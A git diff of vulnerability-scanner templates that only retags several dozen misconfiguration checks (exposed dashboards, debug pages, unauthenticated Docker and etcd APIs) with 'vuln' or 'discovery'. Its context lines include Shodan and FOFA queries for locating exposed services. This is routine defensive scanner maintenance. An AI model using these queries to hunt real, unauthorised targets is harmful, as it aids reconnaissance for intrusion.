misconfig,clickhouse,unauth,disclosure + tags: misconfig,clickhouse,unauth,disclosure,vuln http: - method: GET diff --git a/http/misconfiguration/clockwork-dashboard-exposure.yaml b/http/misconfiguration/clockwork-dashboard-exposure.yaml index a507dbd5058..bd06711a89d 100644 --- a/http/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/http/misconfiguration/clockwork-dashboard-exposure.yaml @@ -9,7 +9,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json metadata: max-request: 1 - tags: exposure,unauth,misconfig + tags: exposure,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/cloud-metadata.yaml b/http/misconfiguration/cloud-metadata.yaml index cb0bf7151f7..c8cd3339d6f 100644 --- a/http/misconfiguration/cloud-metadata.yaml +++ b/http/misconfiguration/cloud-metadata.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"instance_metadata" - tags: misconfig,exposure,devops,cloud,aws,gcp + tags: misconfig,exposure,devops,cloud,aws,gcp,vuln http: - method: GET diff --git a/http/misconfiguration/cloudflare-image-ssrf.yaml b/http/misconfiguration/cloudflare-image-ssrf.yaml index 963bae4a214..a12be4d207b 100644 --- a/http/misconfiguration/cloudflare-image-ssrf.yaml +++ b/http/misconfiguration/cloudflare-image-ssrf.yaml @@ -9,7 +9,7 @@ info: - https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684 metadata: max-request: 1 - tags: cloudflare,misconfig,oast + tags: cloudflare,misconfig,oast,vuln http: - raw: diff --git a/http/misconfiguration/cluster-panel.yaml b/http/misconfiguration/cluster-panel.yaml index 0626dbede28..c21c8539ffd 100644 --- a/http/misconfiguration/cluster-panel.yaml +++ b/http/misconfiguration/cluster-panel.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Cluster Overview - Trino" - tags: cluster,unauth,trino,misconfig + tags: cluster,unauth,trino,misconfig,vuln http: - method: POST diff --git a/http/misconfiguration/cobbler-exposed-directory.yaml b/http/misconfiguration/cobbler-exposed-directory.yaml index feb2e673ce2..ea50d4a8800 100644 --- a/http/misconfiguration/cobbler-exposed-directory.yaml +++ b/http/misconfiguration/cobbler-exposed-directory.yaml @@ -7,7 +7,7 @@ info: description: Searches for exposed Cobbler Directories metadata: max-request: 2 - tags: cobbler,exposure,misconfig + tags: cobbler,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/codeigniter-errorpage.yaml b/http/misconfiguration/codeigniter-errorpage.yaml index 95411b169d9..191de7b2da5 100644 --- a/http/misconfiguration/codeigniter-errorpage.yaml +++ b/http/misconfiguration/codeigniter-errorpage.yaml @@ -14,7 +14,7 @@ info: product: codeigniter shodan-query: title:"Error" html:"CodeIgniter" fofa-query: title="ErrorException" - tags: codeigniter,misconfig,error + tags: codeigniter,misconfig,error,vuln http: - method: GET diff --git a/http/misconfiguration/codemeter-webadmin.yaml b/http/misconfiguration/codemeter-webadmin.yaml index ed808fc409e..8f9cecfa0a9 100644 --- a/http/misconfiguration/codemeter-webadmin.yaml +++ b/http/misconfiguration/codemeter-webadmin.yaml @@ -13,7 +13,7 @@ info: vendor: wibu product: codemeter shodan-query: html:"CodeMeter" - tags: misconfig,exposure,codemeter + tags: misconfig,exposure,codemeter,vuln http: - method: GET diff --git a/http/misconfiguration/codis-dashboard.yaml b/http/misconfiguration/codis-dashboard.yaml index 5997726b8b3..4d7c689e056 100644 --- a/http/misconfiguration/codis-dashboard.yaml +++ b/http/misconfiguration/codis-dashboard.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Codis • Dashboard" - tags: misconfig,exposure,codis + tags: misconfig,exposure,codis,discovery http: - method: GET diff --git a/http/misconfiguration/collectd-exporter-metrics.yaml b/http/misconfiguration/collectd-exporter-metrics.yaml index 84259928803..0675f0e3192 100644 --- a/http/misconfiguration/collectd-exporter-metrics.yaml +++ b/http/misconfiguration/collectd-exporter-metrics.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Collectd Exporter" - tags: collectd,exposure,debug,misconfig + tags: collectd,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/command-api-explorer.yaml b/http/misconfiguration/command-api-explorer.yaml index c2bb9c93af8..4d0ce81d3c6 100644 --- a/http/misconfiguration/command-api-explorer.yaml +++ b/http/misconfiguration/command-api-explorer.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Command API Explorer" - tags: panel,misconfig + tags: panel,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/confluence-dashboard.yaml b/http/misconfiguration/confluence-dashboard.yaml index f3042de4503..36506035adb 100644 --- a/http/misconfiguration/confluence-dashboard.yaml +++ b/http/misconfiguration/confluence-dashboard.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Dashboard - Confluence" - tags: misconfig,exposure,confluence,atlassian + tags: misconfig,exposure,confluence,atlassian,discovery http: - method: GET diff --git a/http/misconfiguration/confluence/confluence-oauth-admin.yaml b/http/misconfiguration/confluence/confluence-oauth-admin.yaml index 04fed5f1baf..ceea432d59a 100644 --- a/http/misconfiguration/confluence/confluence-oauth-admin.yaml +++ b/http/misconfiguration/confluence/confluence-oauth-admin.yaml @@ -12,7 +12,7 @@ info: vendor: atlassian product: confluence_server shodan-query: http.component:"Atlassian Confluence" - tags: misconfig,jira,confluence,atlassian + tags: misconfig,jira,confluence,atlassian,vuln http: - method: GET diff --git a/http/misconfiguration/cookies-without-httponly.yaml b/http/misconfiguration/cookies-without-httponly.yaml index 8c8ecd791e7..ec8371aa9d7 100644 --- a/http/misconfiguration/cookies-without-httponly.yaml +++ b/http/misconfiguration/cookies-without-httponly.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,http,cookie,generic + tags: misconfig,http,cookie,generic,vuln flow: | http() diff --git a/http/misconfiguration/cookies-without-secure.yaml b/http/misconfiguration/cookies-without-secure.yaml index 93ea1a48183..0d5828f6efa 100644 --- a/http/misconfiguration/cookies-without-secure.yaml +++ b/http/misconfiguration/cookies-without-secure.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,http,cookie,generic + tags: misconfig,http,cookie,generic,vuln flow: | http() diff --git a/http/misconfiguration/coolify-register-account.yaml b/http/misconfiguration/coolify-register-account.yaml index a0b941d9086..12a33a5395c 100644 --- a/http/misconfiguration/coolify-register-account.yaml +++ b/http/misconfiguration/coolify-register-account.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Coolify" html:"register" - tags: coolify,register,misconfig + tags: coolify,register,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/corebos-htaccess.yaml b/http/misconfiguration/corebos-htaccess.yaml index 8e13090963d..32def6cdc80 100644 --- a/http/misconfiguration/corebos-htaccess.yaml +++ b/http/misconfiguration/corebos-htaccess.yaml @@ -15,7 +15,7 @@ info: product: corebos vendor: corebos fofa-query: body="corebos" - tags: exposure,corebos,huntr,misconfig + tags: exposure,corebos,huntr,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/cx-cloud-upload-detect.yaml b/http/misconfiguration/cx-cloud-upload-detect.yaml index 523a528c1f7..662c4749583 100644 --- a/http/misconfiguration/cx-cloud-upload-detect.yaml +++ b/http/misconfiguration/cx-cloud-upload-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: fileupload,misconfig,intrusive + tags: fileupload,misconfig,intrusive,vuln http: - method: GET diff --git a/http/misconfiguration/d-link-arbitary-fileread.yaml b/http/misconfiguration/d-link-arbitary-fileread.yaml index ce052b9c081..abadf9cd536 100644 --- a/http/misconfiguration/d-link-arbitary-fileread.yaml +++ b/http/misconfiguration/d-link-arbitary-fileread.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: dlink,lfi,misconfig + tags: dlink,lfi,misconfig,vuln http: - method: POST diff --git a/http/misconfiguration/database-error.yaml b/http/misconfiguration/database-error.yaml index 8884f08c2b5..e4b01ccf958 100644 --- a/http/misconfiguration/database-error.yaml +++ b/http/misconfiguration/database-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Database Error" - tags: misconfig,database + tags: misconfig,database,vuln http: - method: GET diff --git a/http/misconfiguration/dd-wrt-controlpanel-exposure.yaml b/http/misconfiguration/dd-wrt-controlpanel-exposure.yaml index 01f6bb04d97..ceabf706c95 100644 --- a/http/misconfiguration/dd-wrt-controlpanel-exposure.yaml +++ b/http/misconfiguration/dd-wrt-controlpanel-exposure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:252728887 - tags: dd-wrt,exposure,misconfig + tags: dd-wrt,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/debug/ampache-debug.yaml b/http/misconfiguration/debug/ampache-debug.yaml index a22bd202976..678d70381fe 100644 --- a/http/misconfiguration/debug/ampache-debug.yaml +++ b/http/misconfiguration/debug/ampache-debug.yaml @@ -12,7 +12,7 @@ info: vendor: ampache product: ampache shodan-query: http.title:"Ampache -- Debug Page" - tags: misconfig,ampache,debug + tags: misconfig,ampache,debug,vuln http: - method: GET diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml index 9ae80408767..84b4d8c0272 100644 --- a/http/misconfiguration/debug/bottle-debug.yaml +++ b/http/misconfiguration/debug/bottle-debug.yaml @@ -14,7 +14,7 @@ info: vendor: bottlepy product: bottle shodan-query: html:"Sorry, the requested URL" - tags: bottle,exposure,debug,misconfig + tags: bottle,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index 89c8ee1d137..e988c214f7b 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -13,7 +13,7 @@ info: vendor: palletsprojects product: werkzeug shodan-query: html:"Werkzeug powered traceback interpreter" - tags: werkzeug,exposure,debug,misconfig + tags: werkzeug,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/debug/github-debug.yaml b/http/misconfiguration/debug/github-debug.yaml index 83f2e0c2089..7998d6c5347 100644 --- a/http/misconfiguration/debug/github-debug.yaml +++ b/http/misconfiguration/debug/github-debug.yaml @@ -12,7 +12,7 @@ info: vendor: github product: github shodan-query: http.title:"GitHub Debug" - tags: misconfig,github,debug + tags: misconfig,github,debug,vuln http: - method: GET diff --git a/http/misconfiguration/default-spx-key.yaml b/http/misconfiguration/default-spx-key.yaml index 75fceebf188..7af590abff8 100644 --- a/http/misconfiguration/default-spx-key.yaml +++ b/http/misconfiguration/default-spx-key.yaml @@ -17,7 +17,7 @@ info: metadata: verified: true max-request: 11 - tags: spx-php,debug,misconfig,spx + tags: spx-php,debug,misconfig,spx,vuln http: - method: GET diff --git a/http/misconfiguration/deos-openview-admin.yaml b/http/misconfiguration/deos-openview-admin.yaml index c659c3e1a0f..f0cf579b1c5 100644 --- a/http/misconfiguration/deos-openview-admin.yaml +++ b/http/misconfiguration/deos-openview-admin.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-284 metadata: max-request: 1 - tags: openview,disclosure,panel,misconfig + tags: openview,disclosure,panel,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/deployment-interface-exposed.yaml b/http/misconfiguration/deployment-interface-exposed.yaml index 7deaecd0a72..b90f5433cb6 100644 --- a/http/misconfiguration/deployment-interface-exposed.yaml +++ b/http/misconfiguration/deployment-interface-exposed.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: deployment,management,misconfig + tags: deployment,management,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index 30ad7983cd6..341c0bf1356 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Dgraph Ratel Dashboard" product: dgraph vendor: dgraph - tags: exposure,unauth,panel,misconfig + tags: exposure,unauth,panel,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/directory-listing-no-host-header.yaml b/http/misconfiguration/directory-listing-no-host-header.yaml index 2b4b6d4034d..782a9495618 100644 --- a/http/misconfiguration/directory-listing-no-host-header.yaml +++ b/http/misconfiguration/directory-listing-no-host-header.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,listing + tags: misconfig,listing,vuln flow: http(1) && http(2) diff --git a/http/misconfiguration/django-debug-config-enabled.yaml b/http/misconfiguration/django-debug-config-enabled.yaml index cd1f719871b..9ce6c168371 100644 --- a/http/misconfiguration/django-debug-config-enabled.yaml +++ b/http/misconfiguration/django-debug-config-enabled.yaml @@ -7,7 +7,7 @@ info: description: Django debug configuration is enabled, which allows an attacker to obtain system configuration information such as paths or settings. metadata: max-request: 1 - tags: django,debug,misconfig + tags: django,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/dlink-config-dump.yaml b/http/misconfiguration/dlink-config-dump.yaml index 1f9644ec409..d4f3ecf3419 100644 --- a/http/misconfiguration/dlink-config-dump.yaml +++ b/http/misconfiguration/dlink-config-dump.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: title:"D-LINK" - tags: misconfig,config,dump,dlink,auth-bypass,disclosure + tags: misconfig,config,dump,dlink,auth-bypass,disclosure,vuln http: - method: GET diff --git a/http/misconfiguration/dlink-n300-backup.yaml b/http/misconfiguration/dlink-n300-backup.yaml index f0e28fa6868..1ff185f2694 100644 --- a/http/misconfiguration/dlink-n300-backup.yaml +++ b/http/misconfiguration/dlink-n300-backup.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: 'Server: Virtual Web 0.9' fofa-query: body="DSL-124" - tags: dsl,d-link,disclosure,backup + tags: dsl,d-link,disclosure,backup,vuln http: - raw: diff --git a/http/misconfiguration/dlink-unauth-cgi-script.yaml b/http/misconfiguration/dlink-unauth-cgi-script.yaml index 505c04ee86d..de9a41980f5 100644 --- a/http/misconfiguration/dlink-unauth-cgi-script.yaml +++ b/http/misconfiguration/dlink-unauth-cgi-script.yaml @@ -16,7 +16,7 @@ info: vendor: dlink product: dns-345 fofa-query: "app=\"D_Link-DNS\"" - tags: unauth,dlink,misconfig + tags: unauth,dlink,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/docker-daemon-exposed.yaml b/http/misconfiguration/docker-daemon-exposed.yaml index d75ec847895..34dc8a58617 100644 --- a/http/misconfiguration/docker-daemon-exposed.yaml +++ b/http/misconfiguration/docker-daemon-exposed.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: port:2375 product:"docker" fofa-query: app="docker-Daemon" && port="2375" - tags: docker,exposure,misconfig + tags: docker,exposure,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/docker-registry.yaml b/http/misconfiguration/docker-registry.yaml index 51b4cc793e0..70ef4637aee 100644 --- a/http/misconfiguration/docker-registry.yaml +++ b/http/misconfiguration/docker-registry.yaml @@ -9,7 +9,7 @@ info: - https://notsosecure.com/anatomy-of-a-hack-docker-registry metadata: max-request: 1 - tags: misconfig,docker,devops + tags: misconfig,docker,devops,vuln http: - method: GET diff --git a/http/misconfiguration/docmosis-tornado-server.yaml b/http/misconfiguration/docmosis-tornado-server.yaml index f2a93fe4552..ce89ff88075 100644 --- a/http/misconfiguration/docmosis-tornado-server.yaml +++ b/http/misconfiguration/docmosis-tornado-server.yaml @@ -13,7 +13,7 @@ info: vendor: docmosis product: tornado shodan-query: title:"Docmosis Tornado" - tags: misconfig,tornado,exposure + tags: misconfig,tornado,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml index 1b2cc439160..476b48b8cb7 100644 --- a/http/misconfiguration/dont-panic-traceback.yaml +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Debugger" - tags: traceback,dont-panic,misconfig + tags: traceback,dont-panic,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/doris-dashboard.yaml b/http/misconfiguration/doris-dashboard.yaml index 97e867338db..aba56193e04 100644 --- a/http/misconfiguration/doris-dashboard.yaml +++ b/http/misconfiguration/doris-dashboard.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:24048806 - tags: doris,exposure,unauth,logs,misconfig + tags: doris,exposure,unauth,logs,misconfig,discovery http: - method: GET diff --git a/http/misconfiguration/dragonfly-public-signup.yaml b/http/misconfiguration/dragonfly-public-signup.yaml index d16f4b42048..181adf54265 100644 --- a/http/misconfiguration/dragonfly-public-signup.yaml +++ b/http/misconfiguration/dragonfly-public-signup.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="logo-dragonfly.png" - tags: dragonfly,misconfig,register,signup + tags: dragonfly,misconfig,register,signup,vuln variables: username: "{{rand_base(6)}}" diff --git a/http/misconfiguration/druid-monitor.yaml b/http/misconfiguration/druid-monitor.yaml index d1e4f473114..5237c136520 100644 --- a/http/misconfiguration/druid-monitor.yaml +++ b/http/misconfiguration/druid-monitor.yaml @@ -7,7 +7,7 @@ info: description: Alibaba Druid Monitor is exposed. metadata: max-request: 1 - tags: druid,alibaba,unauth,misconfig + tags: druid,alibaba,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml index 576bb707a4f..bd9425d507a 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml @@ -11,7 +11,7 @@ info: - cpe:"cpe:2.3:a:drupal:drupal" product: drupal vendor: drupal - tags: drupal,misconfig + tags: drupal,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml index ff1bd308d05..0dd8bd8d461 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml @@ -12,7 +12,7 @@ info: vendor: drupal product: drupal shodan-query: http.component:"Drupal" - tags: drupal,misconfig + tags: drupal,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/dynamic-container-host.yaml b/http/misconfiguration/dynamic-container-host.yaml index 9dc73a5ecbf..ee45952a4c1 100644 --- a/http/misconfiguration/dynamic-container-host.yaml +++ b/http/misconfiguration/dynamic-container-host.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"Dynamics Container Host" - tags: exposure,dynamic,container,misconfig + tags: exposure,dynamic,container,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ec2-instance-information.yaml b/http/misconfiguration/ec2-instance-information.yaml index 3576db77f95..9c3e103c20a 100644 --- a/http/misconfiguration/ec2-instance-information.yaml +++ b/http/misconfiguration/ec2-instance-information.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"EC2 Instance Information" - tags: misconfig,ec2,aws,amazon + tags: misconfig,ec2,aws,amazon,vuln http: - method: GET diff --git a/http/misconfiguration/ecology-info-leak.yaml b/http/misconfiguration/ecology-info-leak.yaml index 2b736546833..15693f63bb2 100644 --- a/http/misconfiguration/ecology-info-leak.yaml +++ b/http/misconfiguration/ecology-info-leak.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" - tags: ecology,unauth,misconfig + tags: ecology,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/elastic-hd-dashboard.yaml b/http/misconfiguration/elastic-hd-dashboard.yaml index 724b1d7d925..9fa36100a46 100644 --- a/http/misconfiguration/elastic-hd-dashboard.yaml +++ b/http/misconfiguration/elastic-hd-dashboard.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Elastic HD Dashboard" - tags: misconfig,exposure,elastic + tags: misconfig,exposure,elastic,discovery http: - method: GET diff --git a/http/misconfiguration/elasticsearch.yaml b/http/misconfiguration/elasticsearch.yaml index bb626d91c89..b8bbb91eabb 100644 --- a/http/misconfiguration/elasticsearch.yaml +++ b/http/misconfiguration/elasticsearch.yaml @@ -13,7 +13,7 @@ info: vendor: elasticsearch product: elasticsearch shodan-query: "ElasticSearch" - tags: elastic,unauth,elasticsearch,misconfig + tags: elastic,unauth,elasticsearch,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/encompass-cm1-homepage.yaml b/http/misconfiguration/encompass-cm1-homepage.yaml index ced2868e9c7..8e921606d3d 100644 --- a/http/misconfiguration/encompass-cm1-homepage.yaml +++ b/http/misconfiguration/encompass-cm1-homepage.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Encompass CM1 Home Page" - tags: misconfig,encompass,exposure + tags: misconfig,encompass,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/envoy-admin-exposure.yaml b/http/misconfiguration/envoy-admin-exposure.yaml index 460c96fa504..32eda93c65f 100644 --- a/http/misconfiguration/envoy-admin-exposure.yaml +++ b/http/misconfiguration/envoy-admin-exposure.yaml @@ -15,7 +15,7 @@ info: vendor: envoyproxy product: envoy shodan-query: title:"Envoy Admin" - tags: misconfig,envoy,exposure + tags: misconfig,envoy,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/espeasy-mega-exposure.yaml b/http/misconfiguration/espeasy-mega-exposure.yaml index 8f85f2c370f..afd74d31659 100644 --- a/http/misconfiguration/espeasy-mega-exposure.yaml +++ b/http/misconfiguration/espeasy-mega-exposure.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"ESP Easy Mega" - tags: misconfig,espeasy,exposure + tags: misconfig,espeasy,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/esphome-dashboard.yaml b/http/misconfiguration/esphome-dashboard.yaml index 37605f9a9ac..b0737229f94 100644 --- a/http/misconfiguration/esphome-dashboard.yaml +++ b/http/misconfiguration/esphome-dashboard.yaml @@ -14,7 +14,7 @@ info: vendor: esphome product: esphome shodan-query: title:"Dashboard - ESPHome" - tags: misconfig,esphome,exposure,iot + tags: misconfig,esphome,exposure,iot,discovery http: - method: GET diff --git a/http/misconfiguration/etcd-unauthenticated-api.yaml b/http/misconfiguration/etcd-unauthenticated-api.yaml index 071a990f742..4cd95222771 100644 --- a/http/misconfiguration/etcd-unauthenticated-api.yaml +++ b/http/misconfiguration/etcd-unauthenticated-api.yaml @@ -9,7 +9,7 @@ info: - https://hackerone.com/reports/1088429 metadata: max-request: 1 - tags: misconfig,hackerone,unauth,etcd + tags: misconfig,hackerone,unauth,etcd,vuln http: - method: GET diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml index 85f32c2ed93..294ba40ba07 100644 --- a/http/misconfiguration/everything-listing.yaml +++ b/http/misconfiguration/everything-listing.yaml @@ -16,7 +16,7 @@ info: vendor: voidtools product: everything shodan-query: http.favicon.hash:-977323269 - tags: exposure,everything,listing,voidtools,misconfig + tags: exposure,everything,listing,voidtools,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/exposed-docker-api.yaml b/http/misconfiguration/exposed-docker-api.yaml index 14006dee2d7..0bbe1366986 100644 --- a/http/misconfiguration/exposed-docker-api.yaml +++ b/http/misconfiguration/exposed-docker-api.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: docker,unauth,devops,misconfig + tags: docker,unauth,devops,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/exposed-jquery-file-upload.yaml b/http/misconfiguration/exposed-jquery-file-upload.yaml index 6fa9d0963a7..44f1ff7f41b 100644 --- a/http/misconfiguration/exposed-jquery-file-upload.yaml +++ b/http/misconfiguration/exposed-jquery-file-upload.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-434 metadata: max-request: 1 - tags: exposure,jquery,edb,misconfig + tags: exposure,jquery,edb,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/exposed-kafdrop.yaml b/http/misconfiguration/exposed-kafdrop.yaml index eddbc973dd1..824a03ecd4c 100644 --- a/http/misconfiguration/exposed-kafdrop.yaml +++ b/http/misconfiguration/exposed-kafdrop.yaml @@ -7,7 +7,7 @@ info: description: Publicly Kafdrop Interface is exposed. metadata: max-request: 1 - tags: exposure,misconfig,kafdrop + tags: exposure,misconfig,kafdrop,vuln http: - method: GET diff --git a/http/misconfiguration/exposed-kibana.yaml b/http/misconfiguration/exposed-kibana.yaml index d97f7ad75c1..cda54c6a027 100644 --- a/http/misconfiguration/exposed-kibana.yaml +++ b/http/misconfiguration/exposed-kibana.yaml @@ -7,7 +7,7 @@ info: description: Kibana is exposed. metadata: max-request: 3 - tags: kibana,unauth,misconfig + tags: kibana,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/exposed-service-now.yaml b/http/misconfiguration/exposed-service-now.yaml index e1249e99c6d..67b72245556 100644 --- a/http/misconfiguration/exposed-service-now.yaml +++ b/http/misconfiguration/exposed-service-now.yaml @@ -10,7 +10,7 @@ info: - https://github.com/leo-hildegarde/SnowDownKB/ metadata: max-request: 1 - tags: misconfig,servicenow + tags: misconfig,servicenow,vuln http: - method: GET diff --git a/http/misconfiguration/exposed-sqlite-manager.yaml b/http/misconfiguration/exposed-sqlite-manager.yaml index b3d0471b2ad..f9feb542bb3 100644 --- a/http/misconfiguration/exposed-sqlite-manager.yaml +++ b/http/misconfiguration/exposed-sqlite-manager.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/5003 metadata: max-request: 3 - tags: misconfig,sqlite,edb,sqli + tags: misconfig,sqlite,edb,sqli,vuln http: - method: GET diff --git a/http/misconfiguration/express-stack-trace.yaml b/http/misconfiguration/express-stack-trace.yaml index 48e52eceb82..9b3abc5e6d8 100644 --- a/http/misconfiguration/express-stack-trace.yaml +++ b/http/misconfiguration/express-stack-trace.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to Express" - tags: misconfig,express,intrusive + tags: misconfig,express,intrusive,vuln http: - method: GET diff --git a/http/misconfiguration/feiyuxing-info-leak.yaml b/http/misconfiguration/feiyuxing-info-leak.yaml index ce603b36f13..cee8809f265 100644 --- a/http/misconfiguration/feiyuxing-info-leak.yaml +++ b/http/misconfiguration/feiyuxing-info-leak.yaml @@ -18,7 +18,7 @@ info: vendor: feiyuxing product: vec40g_firmware fofa-query: title="飞鱼星企业级智能上网行为管理系统" - tags: misconfig,exposure,iot,wpa,wpa2 + tags: misconfig,exposure,iot,wpa,wpa2,vuln http: - method: GET diff --git a/http/misconfiguration/filebrowser-unauth.yaml b/http/misconfiguration/filebrowser-unauth.yaml index ce5b352659a..4ccda783a00 100644 --- a/http/misconfiguration/filebrowser-unauth.yaml +++ b/http/misconfiguration/filebrowser-unauth.yaml @@ -14,7 +14,7 @@ info: product: filebrowser vendor: filebrowser fofa-query: icon_hash=1052926265 - tags: misconfig,filebrowser,unauth + tags: misconfig,filebrowser,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/flask-redis-docker.yaml b/http/misconfiguration/flask-redis-docker.yaml index 8e50b1b447b..50f98c79377 100644 --- a/http/misconfiguration/flask-redis-docker.yaml +++ b/http/misconfiguration/flask-redis-docker.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"Flask + Redis Queue + Docker" - tags: misconfig,exposure,flask,redis,docker + tags: misconfig,exposure,flask,redis,docker,vuln http: - method: GET diff --git a/http/misconfiguration/forgejo-repo-exposure.yaml b/http/misconfiguration/forgejo-repo-exposure.yaml index 3cf9fe230bc..94c826f9a5a 100644 --- a/http/misconfiguration/forgejo-repo-exposure.yaml +++ b/http/misconfiguration/forgejo-repo-exposure.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Forgejo" - tags: misconfig,exposure,forgejo + tags: misconfig,exposure,forgejo,vuln http: - method: GET diff --git a/http/misconfiguration/formalms-install.yaml b/http/misconfiguration/formalms-install.yaml index 9ff86d9306a..42488676209 100644 --- a/http/misconfiguration/formalms-install.yaml +++ b/http/misconfiguration/formalms-install.yaml @@ -7,7 +7,7 @@ info: description: Formalms Installation is exposed. metadata: max-request: 1 - tags: misconfig,formalms + tags: misconfig,formalms,vuln http: - method: GET diff --git a/http/misconfiguration/freshrss-unauth.yaml b/http/misconfiguration/freshrss-unauth.yaml index c74d9c00ad5..1153ab6ccfd 100644 --- a/http/misconfiguration/freshrss-unauth.yaml +++ b/http/misconfiguration/freshrss-unauth.yaml @@ -14,7 +14,7 @@ info: vendor: freshrss product: freshrss shodan-query: title:"Freshrss" - tags: freshrss,misconfig,unauth,exposed + tags: freshrss,misconfig,unauth,exposed,vuln http: - method: GET diff --git a/http/misconfiguration/fusionauth-admin-setup.yaml b/http/misconfiguration/fusionauth-admin-setup.yaml index 7d0002da707..5395d4d4755 100644 --- a/http/misconfiguration/fusionauth-admin-setup.yaml +++ b/http/misconfiguration/fusionauth-admin-setup.yaml @@ -14,7 +14,7 @@ info: product: fusionauth shodan-query: title:"FusionAuth Setup Wizard" fofa-query: title="FusionAuth Setup Wizard" - tags: misconfig,fusionauth,admin,setup + 